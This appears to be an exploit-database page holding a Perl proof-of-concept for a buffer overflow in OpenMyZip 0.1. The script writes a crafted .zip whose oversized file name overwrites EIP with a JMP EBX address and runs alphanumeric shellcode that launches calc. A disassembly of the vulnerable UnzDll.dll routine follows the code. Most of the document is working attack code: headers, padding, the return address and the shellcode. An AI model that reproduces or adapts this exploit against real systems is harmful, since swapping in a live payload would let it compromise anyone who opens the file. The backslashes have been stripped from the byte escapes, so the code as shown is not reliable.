Home / exploitsPDF  

OpenMyZip 0.1 .ZIP Buffer Overflow

Posted on 03 May 2011

#!/usr/bin/perl
#
#
#[+]Exploit Title: OpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability
#[+]Date: 0252011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/OpenMyZip/3000-2250_4-10657274.html
#[+]Version: v0.1
#[+]Tested On: WIN-XP SP3 Brazil Portuguese
#[+]CVE: N/A
#
#
#

use strict;
use warnings;

my $filename = "Exploit.zip";


print "

		OpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability
";
print "		Created by C4SS!0 G0M3S
";
print "		E-mail Louredo_@hotmail.com
";
print "		Site www.exploit-br.org/

";

print "

[+] Creting ZIP File...
";
sleep(1);
my $head = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .
"x00x00x00";

my $head2 = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $head3 = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";

my $payload = "x41" x 8;
$payload = $payload.
("x61" x 7).#6 POPAD
("x6Ax30").#PUSH 30
("x5Bx52x59").#POP EBX / PUSH EDX / POP ECX
("x41" x 10).#10 INC EAX
("x02xd3").#ADD CL,BL
("x51x58").#PUSH ECX / POP EAX
("x98xd1"); #BASE CONVERSION
#"x98" == "xff"
# "xd1" == "xd0"
#"xff" + "xd0" = CALL EAX AND CODE EXECUTION.;-}
$payload .= "x41" x 22;#MORE PADDING FOR START FROM MY SHELLCODE
$payload .=
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYK9PFQO9OO3LUFRPHLN9R".
"TFDZTNQ5NV8VQSHR8MSM8KLUSRXRHKDMUVPBXOLSUXI48X6FCJUZSODNNCMTBOZ7JP2ULOOU2JMUMPTN".
"5RFFIWQM7MFSPZURQYZ5V05ZU4TO7SLKK5KEUBKJPQ79MW8KM12FXUK92KX9SZWWK2ZHOPL0O13XSQCO".#Alpha SHELLCODE WinExec('calc',0) BaseAddress = EAX
"T67JW9HWKLCLNK3EOPWQCE4PQ9103HMZUHFJUYQ3NMHKENJL1S5NHWVJ97MGK9PXYKN0Q51864NVOMUR".
"9K7OGT86OPYJ03K9GEU3OKXSKYZA";
$payload .= "x44" x (2050-length($payload));
$payload .= "x58x78x39".#POP EAX / JS SHORT 011E0098
"x41" x 5;# PADDING FOR OVERWRITE EIP
$payload .= pack('V',0x00404042);#JMP EBX
$payload .= "x42" x 50;
$payload .= "x41" x (4064-length($payload));

$payload = $payload.".txt";
my $zip = $head.$payload.$head2.$payload.$head3;
open(FILE,">$filename") || die "[-]Error:
$!
";
print FILE $zip;
close(FILE);
print "[+] ZIP File Created With Sucess:)
";
sleep(2);
=head
#
#The Vulnerable Function:
#
#
#The Vulnerable function is in MODULE UnzDll.dll on
#Function UnzDllExec+0x7a3 after CALL the function kernel32.lstrcpyA
#ocorrs the Buffer Overflow on movimentation of the String Very large.
#
#Assemble:
#
#  0x00DA6A6F                                      53               PUSH EBX
#  0x00DA6A70                                      56               PUSH ESI
#  0x00DA6A71                                      8B75 08          MOV ESI,DWORD PTR SS:[EBP+8]
#  0x00DA6A74                                      8B55 18          MOV EDX,DWORD PTR SS:[EBP+18]
#  0x00DA6A77                                      8B45 10          MOV EAX,DWORD PTR SS:[EBP+10]
#  0x00DA6A7A                                      83BE 8CD20000 00 CMP DWORD PTR DS:[ESI+D28C],0
#  0x00DA6A81                                      8D9E 50D80000    LEA EBX,DWORD PTR DS:[ESI+D850]
#  0x00DA6A87                                      74 65            JE SHORT UnzDll.00DA6AEE
#  0x00DA6A89                                      8B8E 84D20000    MOV ECX,DWORD PTR DS:[ESI+D284]
#  0x00DA6A8F                                      890B             MOV DWORD PTR DS:[EBX],ECX
#  0x00DA6A91                                      8B8E 88D20000    MOV ECX,DWORD PTR DS:[ESI+D288]
#  0x00DA6A97                                      894B 04          MOV DWORD PTR DS:[EBX+4],ECX
#  0x00DA6A9A                                      33C9             XOR ECX,ECX
#  0x00DA6A9C                                      C743 08 A0000000 MOV DWORD PTR DS:[EBX+8],0A0
#  0x00DA6AA3                                      894B 0C          MOV DWORD PTR DS:[EBX+C],ECX
#  0x00DA6AA6                                      8B4D 0C          MOV ECX,DWORD PTR SS:[EBP+C]
#  0x00DA6AA9                                      894B 10          MOV DWORD PTR DS:[EBX+10],ECX
#  0x00DA6AAC                                      81BE 88DB0000 91>CMP DWORD PTR DS:[ESI+DB88],91
#  0x00DA6AB6                                      7F 0A            JG SHORT UnzDll.00DA6AC2
#  0x00DA6AB8                                      8BC8             MOV ECX,EAX
#  0x00DA6ABA                                      80E1 FF          AND CL,0FF
#  0x00DA6ABD                                      0FBEC9           MOVSX ECX,CL
#  0x00DA6AC0                                      EB 02            JMP SHORT UnzDll.00DA6AC4
#  0x00DA6AC2                                      8BC8             MOV ECX,EAX
#  0x00DA6AC4                                      894B 14          MOV DWORD PTR DS:[EBX+14],ECX
#  0x00DA6AC7                                      85D2             TEST EDX,EDX
#  0x00DA6AC9                                      8B45 14          MOV EAX,DWORD PTR SS:[EBP+14]
#  0x00DA6ACC                                      8943 18          MOV DWORD PTR DS:[EBX+18],EAX
#  0x00DA6ACF                                      75 06            JNZ SHORT UnzDll.00DA6AD7
#  0x00DA6AD1                                      C643 1C 00       MOV BYTE PTR DS:[EBX+1C],0
#  0x00DA6AD5                                      EB 0A            JMP SHORT UnzDll.00DA6AE1
#  0x00DA6AD7                                      52               PUSH EDX
#  0x00DA6AD8                                      8D53 1C          LEA EDX,DWORD PTR DS:[EBX+1C]
#  0x00DA6ADB                                      52               PUSH EDX
#  0x00DA6ADC                                      E8 ABF20000      CALL UnzDll.00DB5D8C                     ; JMP to kernel32.lstrcpyA
#  0x00DA6AE1                                      53               PUSH EBX
#  0x00DA6AE2                                      FF96 8CD20000    CALL DWORD PTR DS:[ESI+D28C]             ; Here ocorrs the Code Execution:-)
#  0x00DA6AE8                                      0986 70D20000    OR DWORD PTR DS:[ESI+D270],EAX
#  0x00DA6AEE                                      5E               POP ESI
#  0x00DA6AEF                                      5B               POP EBX
#  0x00DA6AF0                                      5D               POP EBP
#  0x00DA6AF1                                      C3               RETN
#
#
#
#
#
=cut

 

TOP

Malware :

Exploits :